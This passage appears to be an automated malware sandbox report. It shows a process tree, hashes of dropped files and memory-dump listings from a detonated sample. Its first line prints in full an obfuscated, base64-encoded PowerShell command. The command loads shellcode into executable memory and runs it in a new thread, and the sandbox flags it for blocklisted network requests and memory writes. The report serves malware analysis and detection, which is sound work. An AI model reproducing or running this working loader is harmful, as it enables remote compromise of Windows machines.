      "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" -enc JABHADQATQAgAD0AIAAnAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKABJAG4AdABQAHQAcgAgAGwAcABBAGQAZAByAGUAcwBzACwAIAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAAgAHUAaQBuAHQAIABmAGwAQQBsAGwAbwBjAGEAdABpAG8AbgBUAHkAcABlACwAIAB1AGkAbgB0ACAAZgBsAFAAcgBvAHQAZQBjAHQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABBAHQAdAByAGkAYgB1AHQAZQBzACwAIAB1AGkAbgB0ACAAZAB3AFMAdABhAGMAawBTAGkAegBlACwAIABJAG4AdABQAHQAcgAgAGwAcABTAHQAYQByAHQAQQBkAGQAcgBlAHMAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAUABhAHIAYQBtAGUAdABlAHIALAAgAHUAaQBuAHQAIABkAHcAQwByAGUAYQB0AGkAbwBuAEYAbABhAGcAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQASQBkACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBtAHMAdgBjAHIAdAAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAbQBlAG0AcwBlAHQAKABJAG4AdABQAHQAcgAgAGQAZQBzAHQALAAgAHUAaQBuAHQAIABzAHIAYwAsACAAdQBpAG4AdAAgAGMAbwB1AG4AdAApADsAJwA7ACQAdwAgAD0AIABBAGQAZAAtAFQAeQBwAGUAIAAtAG0AZQBtAGIAZQByAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAEcANABNACAALQBOAGEAbQBlACAAIgBXAGkAbgAzADIAIgAgAC0AbgBhAG0AZQBzAHAAYQBjAGUAIABXAGkAbgAzADIARgB1AG4AYwB0AGkAbwBuAHMAIAAtAHAAYQBzAHMAdABoAHIAdQA7AFsAQgB5AHQAZQBbAF0AXQA7AFsAQgB5AHQAZQBbAF0AXQAkAHoAIAA9ACAAMAB4AGQAYQAsADAAeABjADcALAAwAHgAYgBiACwAMAB4ADIAMAAsADAAeAA2AGYALAAwAHgAMgA0ACwAMAB4AGEANQAsADAAeABkADkALAAwAHgANwA0ACwAMAB4ADIANAAsADAAeABmADQALAAwAHgANQA4ACwAMAB4ADIAYgAsADAAeABjADkALAAwAHgAYgAxACwAMAB4ADQAYgAsADAAeAA4ADMALAAwAHgAYwAwACwAMAB4ADAANAAsADAAeAAzADEALAAwAHgANQA4ACwAMAB4ADEAMwAsADAAeAAwADMALAAwAHgANwA4ACwAMAB4ADcAYwAsADAAeABjADYALAAwAHgANQAwACwAMAB4ADgANAAsADAAeAA2AGEALAAwAHgAOAA5ACwAMAB4ADkAYgAsADAAeAA3ADQALAAwAHgANgBiACwAMAB4AGYANgAsADAAeAAxADIALAAwAHgAOQAxACwAMAB4ADUAYQAsADAAeAAyADQALAAwAHgANAAwACwAMAB4AGQAMgAsADAAeABjAGYALAAwAHgAZgA4ACwAMAB4ADAAMgAsADAAeABiADYALAAwAHgAZQAzACwAMAB4ADcAMwAsADAAeAA0ADYALAAwAHgAMgAyACwAMAB4ADcANwAsADAAeABmADEALAAwAHgANABmACwAMAB4ADcAYgAsADAAeAA3ADgALAAwAHgAZgA5ACwAMAB4ADMAOAAsADAAeAAzADEALAAwAHgAYQAwACwAMAB4ADMANwAsADAAeAA4ADcALAAwAHgANgA5ACwAMAB4ADkAMAAsADAAeAA1ADYALAAwAHgANwBiACwAMAB4ADcAMwAsADAAeABjADUALAAwAHgAYgA4ACwAMAB4ADQAMgAsADAAeABiAGMALAAwAHgAMQA4ACwAMAB4AGIAOAAsADAAeAA4ADMALAAwAHgAMABiACwAMAB4ADUANgAsADAAeAA1ADUALAAwAHgANQA5ACwAMAB4AGQAYwAsADAAeAAxADMALAAwAHgAZgBiACwAMAB4ADQAZQAsADAAeAA2ADkALAAwAHgANgAxACwAMAB4AGMAMAAsADAAeAA2AGYALAAwAHgAYgBkACwAMAB4AGUAZAAsADAAeAA3ADgALAAwAHgAMAA4ACwAMAB4AGIAOAAsADAAeAAzADIALAAwAHgAMABjACwAMAB4AGEANAAsADAAeABjADMALAAwAHgANgAyACwAMAB4AGIAZAAsADAAeABiAGYALAAwAHgAOABiACwAMAB4ADkAYQAsADAAeABiADUALAAwAHgAOQA4ACwAMAB4ADIAYgAsADAAeAA5AGEALAAwAHgAMQBhACwAMAB4ADkAZAAsADAAeABlADIALAAwAHgAZQA4ACwAMAB4AGEAMAAsADAAeABkADcALAAwAHgANwBmACwAMAB4ADIANAAsADAAeAA1ADIALAAwAHgAZQA2ACwAMAB4AGEAOQAsADAAeAA3ADQALAAwAHgAOQBiACwAMAB4AGQAOAAsADAAeAA5ADUALAAwAHgAZABiACwAMAB4AGEAMgAsADAAeABkADQALAAwAHgAMQA4ACwAMAB4ADIANQAsADAAeABlADIALAAwAHgAZAAzACwAMAB4AGMAMgAsADAAeAA1ADAALAAwAHgAMQA4ACwAMAB4ADIAMAAsADAAeAA3AGYALAAwAHgANgAzACwAMAB4AGQAYgAsADAAeAA1AGEALAAwAHgANQBiACwAMAB4AGUANgAsADAAeABmAGMALAAwAHgAZgBkACwAMAB4ADIAOAAsADAAeAA1ADAALAAwAHgAZAA5ACwAMAB4AGYAYwAsADAAeABmAGQALAAwAHgAMAA3ACwAMAB4AGEAYQAsADAAeABmADMALAAwAHgANABhACwAMAB4ADQAMwAsADAAeABmADQALAAwAHgAMQA3ACwAMAB4ADQAZAAsADAAeAA4ADAALAAwAHgAOABlACwAMAB4ADIAYwAsADAAeABjADYALAAwAHgAMgA3ACwAMAB4ADQAMQAsADAAeABhADUALAAwAHgAOQBjACwAMAB4ADAAMwAsADAAeAA0ADUALAAwAHgAZQBkACwAMAB4ADQANwAsADAAeAAyAGQALAAwAHgAZABjACwAMAB4ADQAYgAsADAAeAAyADYALAAwAHgANQAyACwAMAB4ADMAZQAsADAAeAAzADMALAAwAHgAOQA3ACwAMAB4AGYANgAsADAAeAAzADQALAAwAHgAZAA2ACwAMAB4AGMAZQAsADAAeAA4ADcALAAwAHgAYgA0ACwAMAB4ADIAOAAsADAAeABlAGYALAAwAHgAZAA1ACwAMAB4ADIAMgAsADAAeABlADQALAAwAHgAMwBkACwAMAB4AGUANgAsADAAeABiADIALAAwAHgANgAyACwAMAB4ADMANgAsADAAeAA5ADUALAAwAHgAOAAwACwAMAB4ADIAZAAsADAAeABlAGMALAAwAHgAMwAxACwAMAB4AGEAOQAsADAAeABhADYALAAwAHgAMgBhACwAMAB4AGMANQAsADAAeABiADgALAAwAHgAYQAxACwAMAB4AGMAZAAsADAAeAAxADkALAAwAHgAMAAyACwAMAB4AGEAMQAsADAAeAAzADAALAAwAHgAOQBhACwAMAB4ADcAMwAsADAAeABlAGIALAAwAHgAZgA2ACwAMAB4AGMAZQAsADAAeAAyADMALAAwAHgAOAAzACwAMAB4AGQAZgAsADAAeAA2AGUALAAwAHgAYQA4ACwAMAB4ADUAMwAsADAAeABlADAALAAwAHgAYgBhACwAMAB4ADQANQAsADAAeAA1AGUALAAwAHgANwA2ACwAMAB4AGUAOAAsADAAeAA0AGUALAAwAHgAOAA1ACwAMAB4AGEAYgAsADAAeAA5AGEALAAwAHgANgBjACwAMAB4ADMAYQAsADAAeABhADQALAAwAHgAMgBjACwAMAB4AGYAOAAsADAAeABkAGMALAAwAHgAOQBhACwAMAB4ADgAMAAsADAAeABhAGEALAAwAHgANwAwACwAMAB4ADUAYQAsADAAeAA3ADEALAAwAHgAMABiACwAMAB4ADIAMQAsADAAeAAzADIALAAwAHgAOQBiACwAMAB4ADgANAAsADAAeAAxAGUALAAwAHgAMgAyACwAMAB4AGEANAAsADAAeAA0AGUALAAwAHgAMwA3ACwAMAB4AGMAOAAsADAAeAA0AGIALAAwAHgAMgA3ACwAMAB4ADYAZgAsADAAeAA2ADQALAAwAHgAZgA1ACwAMAB4ADYAMgAsADAAeABmAGIALAAwAHgAMQA1ACwAMAB4AGYAYQAsADAAeABiADgALAAwAHgAOAAxACwAMAB4ADEANQAsADAAeAA3ADAALAAwAHgANABmACwAMAB4ADcANQAsADAAeABkAGIALAAwAHgANwAxACwAMAB4ADMAYQAsADAAeAA2ADUALAAwAHgAOABiACwAMAB4ADcAMQAsADAAeAA3ADEALAAwAHgAZAA3ACwAMAB4ADEAZAAsADAAeAA4AGQALAAwAHgAYQBmACwAMAB4ADcAMgAsADAAeABhADEALAAwAHgAMQBiACwAMAB4ADUANAAsADAAeABkADUALAAwAHgAZgA2ACwAMAB4AGIAMwAsADAAeAA1ADYALAAwAHgAMAAwACwAMAB4ADMAMAAsADAAeAAxAGMALAAwAHgAYQA4ACwAMAB4ADYANwAsADAAeAA0AGIALAAwAHgAOQA1ACwAMAB4ADMAYwAsADAAeABjADgALAAwAHgAMgAzACwAMAB4AGQAYQAsADAAeABkADAALAAwAHgAYwA4ACwAMAB4AGIAMwAsADAAeAA4AGMALAAwAHgAYgBhACwAMAB4AGMAOAAsADAAeABkAGIALAAwAHgANgA4ACwAMAB4ADkAZgAsADAAeAA5AGEALAAwAHgAZgBlACwAMAB4ADcANgAsADAAeAAwAGEALAAwAHgAOABmACwAMAB4ADUAMwAsADAAeABlADMALAAwAHgAYgA1ACwAMAB4AGUANgAsADAAeAAwADAALAAwAHgAYQA0ACwAMAB4AGQAZAAsADAAeAAwADQALAAwAHgANwBmACwAMAB4ADgAMgAsADAAeAA0ADEALAAwAHgAZgA2ACwAMAB4AGEAYQAsADAAeAAxADIALAAwAHgAYgBkACwAMAB4ADIAMQAsADAAeAA5ADIALAAwAHgANgAwACwAMAB4AGEAZgAsADAAeABmADEAOwAkAGcAIAA9ACAAMAB4ADEAMAAwADAAOwBpAGYAIAAoACQAegAuAEwAZQBuAGcAdABoACAALQBnAHQAIAAwAHgAMQAwADAAMAApAHsAJABnACAAPQAgACQAegAuAEwAZQBuAGcAdABoAH0AOwAkAHYANQBmAE0APQAkAHcAOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsADAAeAAxADAAMAAwACwAJABnACwAMAB4ADQAMAApADsAZgBvAHIAIAAoACQAaQA9ADAAOwAkAGkAIAAtAGwAZQAgACgAJAB6AC4ATABlAG4AZwB0AGgALQAxACkAOwAkAGkAKwArACkAIAB7ACQAdwA6ADoAbQBlAG0AcwBlAHQAKABbAEkAbgB0AFAAdAByAF0AKAAkAHYANQBmAE0ALgBUAG8ASQBuAHQAMwAyACgAKQArACQAaQApACwAIAAkAHoAWwAkAGkAXQAsACAAMQApAH0AOwAkAHcAOgA6AEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgAMAAsADAALAAkAHYANQBmAE0ALAAwACwAMAAsADAAKQA7AGYAbwByACAAKAA7ADsAKQB7AFMAdABhAHIAdAAtAHMAbABlAGUAcAAgADYAMAB9ADsA
      4⤵
      Blocklisted process makes network request
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2212
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\016f_msf.cmdline"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:2928
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESCD3F.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCCD3E.tmp"
        6⤵
        
        PID:2856

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\016f_msf.dll

Filesize
3KB

MD5
a5e8eca7c5bdc3cd511b5fe4b5126b7a

SHA1
d8948a39dc0d78d0668f49f1441932c4c9a99d2a

SHA256
7939a6c0678708f586f82cb0ddafe00ae2f2be077f54b47eb015ccc8c8dfae39

SHA512
9f2769d9b5edd40731493da3f484eea94db1d68cd47e662ad172687fa7d00b9cfd7676eb5555e38f1b18b36f8a18d22fe0bdd920205210974ab75b2b686beac6

Download Submit
C:\Users\Admin\AppData\Local\Temp\016f_msf.pdb

Filesize
7KB

MD5
a49bd0e814796693dd1a0849de525806

SHA1
4825d4f2c07f7df2bd8c9ba6df4793cca1862fec

SHA256
f0a73f0da6a8b535eba2247cccb3ede6a2e95cd6ace24ac11617c3238d2a9c56

SHA512
8c887f1850ba1cca7b14fbc9eb80e06d07bd0f8b01d2a1d995cb5e4f1bcfe1d9b396564585eae355f33929eed51d6913d525b4ac6d4b3a4c2a4f30a9f94fb48f

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESCD3F.tmp

Filesize
1KB

MD5
6e7d5367b0996f059cf935d93ee22a56

SHA1
ba28db4e4be106730dd7073c2a58b8798c13a9f1

SHA256
b9ae57e51fe3eaea6354ad29fadb871db25827fea90f6b71b89c701d5ab1de7c

SHA512
904d9f2102060923e8e4c992ba0c8b94894ce1f160e5b5eb7f0080032f9f143349058f0f28af344324d3ba641c64dcb408dfc4a89caaf0bf0e82189730800b81

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\1F3G3M9AZ4EUWPSGD1K3.temp

Filesize
7KB

MD5
20bbe714dd8aa589de979af9b17d8926

SHA1
584f74ee2afe8a581dbcfbd57480c1eefd7fdf7a

SHA256
f84da3bc4a559d0ab3c51f731ff0351dd503b54741cbb2d141764b8c8ce4b8d3

SHA512
a15f7839129f947461bc1c14e203ccde01a5e6730fa184f43931e0f35fa0b063c94c37bd90ac7fb1c2612e30ce43d29cef1d4b9ca093a619f27b4ec57bbdb7e0

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\016f_msf.0.cs

Filesize
557B

MD5
7319070c34daa5f6f2ece2dfc07119ee

SHA1
f26a4a48518a5608e93c8b77368f588b0433973c

SHA256
b240a9bb4f72d886522e19fa40b9c688fa94c1bd6dc7b7185f94e4466273a5dc

SHA512
34169fc9fb0cd2381c45efcd22ec1bc659ef513e73bc4c7bcb91ca1d5129a1a149e9f75297acb4958e52ff04d75e6e121232dbc0657611e41b63f10aa3e1d6bd

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\016f_msf.cmdline

Filesize
309B

MD5
928d2974d60802437c64c0a2f5506a68

SHA1
f4196b8b19b0032bd21e2740c54ef8e5d08f800c

SHA256
01d35d67ed7747e1c86b635868d0e56a093b656698b369188fb99c842a8aa158

SHA512
d2805171ab13b36d5868c3e7ca4d1da0f6bbd8dad0cb15618d309070de806f819d2983fa0d860358df1fb9ba9b26467e5b811345dc9e1e9de8e3477dac35c594

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSCCD3E.tmp

Filesize
652B

MD5
b7b9a81ea13ade53ebcf2a704f4d1e14

SHA1
6fd855b812dc9c7d25fa967ad43eb7fe4822d3e4

SHA256
f754153d3404d18c6ec012b8fc9a9027ce43af27fffd529835d2f9b8affaba6f

SHA512
9379737f3b3a55508f2d97ee95d6b65e69e0d71b15790fb386aab2174afe1f6a7c69683327cc4978db9d4712756e2b4b2e1f4d8b02b8e477e4336d0e5c7bc02b

Download Submit
memory/2156-73-0x000007FEF5A10000-0x000007FEF63FC000-memory.dmp

Filesize
9.9MB

Download
memory/2156-107-0x000007FEF5A10000-0x000007FEF63FC000-memory.dmp

Filesize
9.9MB

Download
memory/2156-53-0x00000000010F0000-0x00000000010FA000-memory.dmp

Filesize
40KB

Download
memory/2156-54-0x000007FEF5A10000-0x000007FEF63FC000-memory.dmp

Filesize
9.9MB

Download
memory/2212-72-0x0000000002620000-0x0000000002660000-memory.dmp

Filesize
256KB

Download
memory/2212-70-0x0000000002620000-0x0000000002660000-memory.dmp

Filesize
256KB

Download
memory/2212-71-0x0000000073700000-0x0000000073CAB000-memory.dmp

Filesize
5.7MB

Download
memory/2212-97-0x00000000047E0000-0x00000000047E1000-memory.dmp

Filesize
4KB

Download
memory/2212-99-0x0000000073700000-0x0000000073CAB000-memory.dmp

Filesize
5.7MB

Download
memory/2212-96-0x0000000073700000-0x0000000073CAB000-memory.dmp

Filesize
5.7MB

Download
memory/2212-95-0x00000000047E0000-0x00000000047E1000-memory.dmp

Filesize
4KB

Download
memory/2212-100-0x0000000002620000-0x0000000002660000-memory.dmp

Filesize
256KB

Download
memory/2212-101-0x0000000002620000-0x0000000002660000-memory.dmp

Filesize
256KB

Download
memory/2212-105-0x0000000073700000-0x0000000073CAB000-memory.dmp

Filesize
5.7MB

Download
memory/2212-69-0x0000000073700000-0x0000000073CAB000-memory.dmp

Filesize
5.7MB

Download
memory/2212-98-0x0000000002620000-0x0000000002660000-memory.dmp

Filesize
256KB

Download
memory/2648-66-0x0000000002A70000-0x0000000002AF0000-memory.dmp

Filesize
512KB

Download
memory/2648-65-0x000007FEF4F40000-0x000007FEF58DD000-memory.dmp

Filesize
9.6MB

Download
memory/2648-59-0x000000001B4D0000-0x000000001B7B2000-memory.dmp

Filesize
2.9MB

Download
memory/2648-77-0x0000000002A70000-0x0000000002AF0000-memory.dmp

Filesize
512KB

Download
memory/2648-76-0x0000000002A70000-0x0000000002AF0000-memory.dmp

Filesize
512KB

Download
memory/2648-75-0x0000000002A70000-0x0000000002AF0000-memory.dmp

Filesize
512KB

Download
memory/2648-74-0x000007FEF4F40000-0x000007FEF58DD000-memory.dmp

Filesize
9.6MB

Download
memory/2648-84-0x0000000002A70000-0x0000000002AF0000-memory.dmp

Filesize
512KB

Download
memory/2648-64-0x0000000002A70000-0x0000000002AF0000-memory.dmp

Filesize
512KB

Download
memory/2648-63-0x0000000002A70000-0x0000000002AF0000-memory.dmp

Filesize
512KB

Download
memory/2648-62-0x0000000002A70000-0x0000000002AF0000-memory.dmp

Filesize
512KB

Download
memory/2648-61-0x000007FEF4F40000-0x000007FEF58DD000-memory.dmp

Filesize
9.6MB

Download
memory/2648-60-0x0000000001ED0000-0x0000000001ED8000-memory.dmp

Filesize
32KB

Download
memory/2648-106-0x000007FEF4F40000-0x000007FEF58DD000-memory.dmp

Filesize
9.6MB

Download
memory/2928-83-0x0000000002060000-0x00000000020A0000-memory.dmp

Filesize
256KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads